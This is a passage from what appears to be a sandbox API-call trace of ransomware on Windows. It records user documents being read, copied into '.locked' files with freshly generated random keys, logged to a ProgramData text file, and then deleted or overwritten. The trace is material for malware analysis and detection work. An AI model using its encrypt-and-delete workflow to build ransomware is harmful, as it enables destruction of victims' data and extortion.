(hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0287.836] CloseHandle (hObject=0x1b0) returned 1 [0287.864] SetEvent (hEvent=0x190) returned 1 [0287.865] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0288.163] SetEvent (hEvent=0x12c) returned 1 [0288.163] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0288.413] SetEvent (hEvent=0x190) returned 1 [0288.413] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0288.452] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12621a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x12621a24*=0xb) returned 1 [0288.506] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Ej4CnCJUCwn5 nF.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ej4cncjucwn5 nf.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0288.507] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x12621d9c | out: lpMode=0x12621d9c) returned 0 [0288.507] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Ej4CnCJUCwn5 nF.docx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ej4cncjucwn5 nf.docx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0288.507] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x12621d9c | out: lpMode=0x12621d9c) returned 0 [0288.507] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390020 | out: pbBuffer=0x12390020) returned 1 [0288.507] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766040 | out: pbBuffer=0x12766040) returned 1 [0288.507] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702381 | out: pbBuffer=0x12702381) returned 1 [0288.508] WriteFile (in: hFile=0x1f4, lpBuffer=0x124cb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12621d78, lpOverlapped=0x0 | out: lpBuffer=0x124cb000*, lpNumberOfBytesWritten=0x12621d78*=0x80, lpOverlapped=0x0) returned 1 [0288.513] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x0 [0288.524] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0288.524] SetEvent (hEvent=0x150) returned 1 [0288.524] SetEvent (hEvent=0x1dc) returned 1 [0288.524] SetEvent (hEvent=0x1b8) returned 1 [0288.524] SetEvent (hEvent=0x12c) returned 1 [0288.524] ReadFile (in: hFile=0x218, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12621d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x12621d68*=0x1558b, lpOverlapped=0x0) returned 1 [0288.527] WriteFile (in: hFile=0x1f4, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x1558b, lpNumberOfBytesWritten=0x12621d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x12621d74*=0x1558b, lpOverlapped=0x0) returned 1 [0288.561] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0288.780] SetEvent (hEvent=0x1dc) returned 1 [0288.780] ReadFile (in: hFile=0x218, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12621d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x12621d68*=0x0, lpOverlapped=0x0) returned 1 [0288.781] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0288.932] SetEvent (hEvent=0x150) returned 1 [0288.932] CloseHandle (hObject=0x1f4) returned 1 [0288.937] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0289.070] SetEvent (hEvent=0x150) returned 1 [0289.070] SetEvent (hEvent=0x1b8) returned 1 [0289.070] CloseHandle (hObject=0x218) returned 1 [0289.070] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0289.834] SetEvent (hEvent=0x1dc) returned 1 [0289.834] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0290.370] SetEvent (hEvent=0x1dc) returned 1 [0290.370] SetEvent (hEvent=0x12c) returned 1 [0290.370] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0290.437] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0290.530] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0290.539] SetEvent (hEvent=0x1dc) returned 1 [0290.539] SetEvent (hEvent=0x104) returned 1 [0290.539] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0290.638] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0290.839] SetEvent (hEvent=0x1b8) returned 1 [0290.839] SetEvent (hEvent=0x134) returned 1 [0290.839] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0292.930] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0292.993] SetEvent (hEvent=0x12c) returned 1 [0292.993] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0293.485] SetEvent (hEvent=0x104) returned 1 [0293.485] SetEvent (hEvent=0x1dc) returned 1 [0293.485] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0293.656] SetEvent (hEvent=0x104) returned 1 [0293.656] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0293.675] SetEvent (hEvent=0x22c) returned 1 [0293.675] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0295.248] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239da24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x1239da24*=0xb) returned 1 [0295.272] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\My Music" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my music"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0295.322] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0295.352] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0295.428] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0295.553] SetEvent (hEvent=0x1ac) returned 1 [0295.553] SetEvent (hEvent=0x190) returned 1 [0295.553] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0295.593] SetEvent (hEvent=0x14c) returned 1 [0295.593] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0295.630] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0295.712] SetEvent (hEvent=0x14c) returned 1 [0295.712] SetEvent (hEvent=0x12c) returned 1 [0295.712] SetEvent (hEvent=0x190) returned 1 [0295.712] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0295.785] SetEvent (hEvent=0x14c) returned 1 [0295.785] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0295.825] SetEvent (hEvent=0x1b8) returned 1 [0295.825] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0295.930] SetEvent (hEvent=0x1b8) returned 1 [0295.930] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0295.977] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0295.977] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e030 | out: pbBuffer=0x1234e030) returned 1 [0295.978] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0295.978] WriteFile (in: hFile=0x218, lpBuffer=0x126c3000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239dd78, lpOverlapped=0x0 | out: lpBuffer=0x126c3000*, lpNumberOfBytesWritten=0x1239dd78*=0x80, lpOverlapped=0x0) returned 1 [0296.156] ReadFile (in: hFile=0x1f4, lpBuffer=0x13448000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x13448000*, lpNumberOfBytesRead=0x1239dd68*=0x9d10, lpOverlapped=0x0) returned 1 [0296.182] WriteFile (in: hFile=0x218, lpBuffer=0x13448000*, nNumberOfBytesToWrite=0x9d10, lpNumberOfBytesWritten=0x1239dd74, lpOverlapped=0x0 | out: lpBuffer=0x13448000*, lpNumberOfBytesWritten=0x1239dd74*=0x9d10, lpOverlapped=0x0) returned 1 [0296.187] ReadFile (in: hFile=0x1f4, lpBuffer=0x13448000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x13448000*, lpNumberOfBytesRead=0x1239dd68*=0x0, lpOverlapped=0x0) returned 1 [0296.187] CloseHandle (hObject=0x218) returned 1 [0296.190] CloseHandle (hObject=0x1f4) returned 1 [0296.202] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0296.204] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1239de94 | out: lpMode=0x1239de94) returned 0 [0296.204] WriteFile (in: hFile=0x1f4, lpBuffer=0x12348240*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x1239de64, lpOverlapped=0x0 | out: lpBuffer=0x12348240*, lpNumberOfBytesWritten=0x1239de64*=0x2f, lpOverlapped=0x0) returned 1 [0296.204] CloseHandle (hObject=0x1f4) returned 1 [0296.207] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\5yfr.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\5yfr.docx")) returned 1 [0296.323] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0296.643] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0296.654] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0297.969] SetEvent (hEvent=0x12c) returned 1 [0297.969] SetEvent (hEvent=0x190) returned 1 [0297.969] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0297.996] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0298.122] SetEvent (hEvent=0x1ac) returned 1 [0298.123] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0298.201] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Ifzi1.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ifzi1.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0298.203] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12625d9c | out: lpMode=0x12625d9c) returned 0 [0298.203] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Ifzi1.xlsx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ifzi1.xlsx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0299.738] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0299.810] SetEvent (hEvent=0x21c) returned 1 [0299.810] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x12625d9c | out: lpMode=0x12625d9c) returned 0 [0299.810] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0299.841] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0299.853] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0299.898] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1261fa24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x1261fa24*=0xb) returned 1 [0299.911] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0299.972] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\0ToZccO18urTblN.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\0tozcco18urtbln.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0299.972] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1261fd9c | out: lpMode=0x1261fd9c) returned 0 [0299.972] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\0ToZccO18urTblN.rtf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\0tozcco18urtbln.rtf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0299.973] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x1261fd9c | out: lpMode=0x1261fd9c) returned 0 [0299.973] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc0c0 | out: pbBuffer=0x125fc0c0) returned 1 [0299.973] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766080 | out: pbBuffer=0x12766080) returned 1 [0299.973] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714381 | out: pbBuffer=0x12714381) returned 1 [0299.973] WriteFile (in: hFile=0x1c0, lpBuffer=0x12678000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1261fd78, lpOverlapped=0x0 | out: lpBuffer=0x12678000*, lpNumberOfBytesWritten=0x1261fd78*=0x80, lpOverlapped=0x0) returned 1 [0299.975] SetEvent (hEvent=0x214) returned 1 [0299.975] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0300.067] SetEvent (hEvent=0x198) returned 1 [0300.069] ReadFile (in: hFile=0x1a4, lpBuffer=0x13338000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1235fd68, lpOverlapped=0x0 | out: lpBuffer=0x13338000*, lpNumberOfBytesRead=0x1235fd68*=0x1bc5, lpOverlapped=0x0) returned 1 [0300.071] WriteFile (in: hFile=0x1c0, lpBuffer=0x13338000*, nNumberOfBytesToWrite=0x1bc5, lpNumberOfBytesWritten=0x1235fd74, lpOverlapped=0x0 | out: lpBuffer=0x13338000*, lpNumberOfBytesWritten=0x1235fd74*=0x1bc5, lpOverlapped=0x0) returned 1 [0300.136] ReadFile (in: hFile=0x1a4, lpBuffer=0x13338000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1235fd68, lpOverlapped=0x0 | out: lpBuffer=0x13338000*, lpNumberOfBytesRead=0x1235fd68*=0x0, lpOverlapped=0x0) returned 1 [0300.137] CloseHandle (hObject=0x1c0) returned 1 [0300.138] CloseHandle (hObject=0x1a4) returned 1 [0300.138] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0300.139] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1235fe94 | out: lpMode=0x1235fe94) returned 0 [0300.139] WriteFile (in: hFile=0x1a4, lpBuffer=0x125ee0c0*, nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x1235fe64, lpOverlapped=0x0 | out: lpBuffer=0x125ee0c0*, lpNumberOfBytesWritten=0x1235fe64*=0x52, lpOverlapped=0x0) returned 1 [0300.139] CloseHandle (hObject=0x1a4) returned 1 [0300.141] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\0ToZccO18urTblN.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\0tozcco18urtbln.rtf")) returned 1 [0300.425] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0300.471] SetEvent (hEvent=0x198) returned 1 [0300.471] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0300.498] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0300.506] SetEvent (hEvent=0x22c) returned 1 [0300.506] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0300.652] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x0 [0300.654] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0300.654] SetEvent (hEvent=0x150) returned 1 [0300.654] SetEvent (hEvent=0x1f0) returned 1 [0300.654] SetEvent (hEvent=0x1dc) returned 1 [0300.657] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0300.664] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0300.665] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0300.671] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0300.672] SetEvent (hEvent=0x184) returned 1 [0300.672] SetEvent (hEvent=0x1dc) returned 1 [0300.672] SetEvent (hEvent=0x1f0) returned 1 [0300.672] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0300.674] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0300.674] SetEvent (hEvent=0x1dc) returned 1 [0300.674] SetEvent (hEvent=0x1f0) returned 1 [0300.674] SetEvent (hEvent=0x184) returned 1 [0300.709] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Ifzi1.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ifzi1.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0300.712] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1239de88 | out: lpMode=0x1239de88) returned 0 [0300.713] WriteFile (in: hFile=0x1c8, lpBuffer=0x1412e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1239de78, lpOverlapped=0x0 | out: lpBuffer=0x1412e000*, lpNumberOfBytesWritten=0x1239de78*=0xfa000, lpOverlapped=0x0) returned 1 [0300.746] CloseHandle (hObject=0x1c8) returned 1 [0301.508] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0301.531] SetEvent (hEvent=0x12c) returned 1 [0301.531] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0301.535] SetEvent (hEvent=0x198) returned 1 [0301.535] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0301.540] SetEvent (hEvent=0x21c) returned 1 [0301.540] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0302.065] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0302.065] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8040 | out: pbBuffer=0x124a8040) returned 1 [0302.065] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0302.066] WriteFile (in: hFile=0x1f4, lpBuffer=0x125eb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12667d78, lpOverlapped=0x0 | out: lpBuffer=0x125eb000*, lpNumberOfBytesWritten=0x12667d78*=0x80, lpOverlapped=0x0) returned 1 [0302.069] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x0 [0302.072] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0302.072] SetEvent (hEvent=0x150) returned 1 [0302.072] SetEvent (hEvent=0x12c) returned 1 [0302.072] SetEvent (hEvent=0x214) returned 1 [0302.072] SetEvent (hEvent=0x1b8) returned 1 [0302.072] ReadFile (in: hFile=0x180, lpBuffer=0x14350000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12667d68, lpOverlapped=0x0 | out: lpBuffer=0x14350000*, lpNumberOfBytesRead=0x12667d68*=0x1869d, lpOverlapped=0x0) returned 1 [0302.082] WriteFile (in: hFile=0x1f4, lpBuffer=0x14350000*, nNumberOfBytesToWrite=0x1869d, lpNumberOfBytesWritten=0x12667d74, lpOverlapped=0x0 | out: lpBuffer=0x14350000*, lpNumberOfBytesWritten=0x12667d74*=0x1869d, lpOverlapped=0x0) returned 1 [0302.126] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0302.700] SetEvent (hEvent=0x150) returned 1 [0302.700] ReadFile (in: hFile=0x180, lpBuffer=0x14350000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12667d68, lpOverlapped=0x0 | out: lpBuffer=0x14350000*, lpNumberOfBytesRead=0x12667d68*=0x0, lpOverlapped=0x0) returned 1 [0302.700] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0303.060] CloseHandle (hObject=0x1f4) returned 1 [0303.772] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0303.826] CloseHandle (hObject=0x180) returned 1 [0303.826] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0303.902] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0303.911] SetEvent (hEvent=0x134) returned 1 [0303.911] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0303.929] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0303.931] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12667a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x12667a24*=0xb) returned 1 [0303.998] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\nRY0tYZ9Ff0noTxW-ck.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\nry0tyz9ff0notxw-ck.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0303.999] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12667d9c | out: lpMode=0x12667d9c) returned 0 [0303.999] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\nRY0tYZ9Ff0noTxW-ck.pptx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\nry0tyz9ff0notxw-ck.pptx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0304.058] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0304.147] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x12667d9c | out: lpMode=0x12667d9c) returned 0 [0304.147] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0304.147] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766020 | out: pbBuffer=0x12766020) returned 1 [0304.147] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0304.147] WriteFile (in: hFile=0x228, lpBuffer=0x126a2000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12667d78, lpOverlapped=0x0 | out: lpBuffer=0x126a2000*, lpNumberOfBytesWritten=0x12667d78*=0x80, lpOverlapped=0x0) returned 1 [0304.151] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0304.154] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0304.154] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0304.154] SetEvent (hEvent=0x190) returned 1 [0304.154] SetEvent (hEvent=0x184) returned 1 [0304.154] SetEvent (hEvent=0x12c) returned 1 [0304.154] ReadFile (in: hFile=0x180, lpBuffer=0x13512000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12667d68, lpOverlapped=0x0 | out: lpBuffer=0x13512000*, lpNumberOfBytesRead=0x12667d68*=0x18cc1, lpOverlapped=0x0) returned 1 [0304.160] WriteFile (in: hFile=0x228, lpBuffer=0x13512000*, nNumberOfBytesToWrite=0x18cc1, lpNumberOfBytesWritten=0x12667d74, lpOverlapped=0x0 | out: lpBuffer=0x13512000*, lpNumberOfBytesWritten=0x12667d74*=0x18cc1, lpOverlapped=0x0) returned 1 [0304.167] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0304.326] ReadFile (in: hFile=0x180, lpBuffer=0x13512000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12667d68, lpOverlapped=0x0 | out: lpBuffer=0x13512000*, lpNumberOfBytesRead=0x12667d68*=0x0, lpOverlapped=0x0) returned 1 [0304.329] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0304.414] CloseHandle (hObject=0x228) returned 1 [0304.420] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0304.555] CloseHandle (hObject=0x180) returned 1 [0304.555] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, 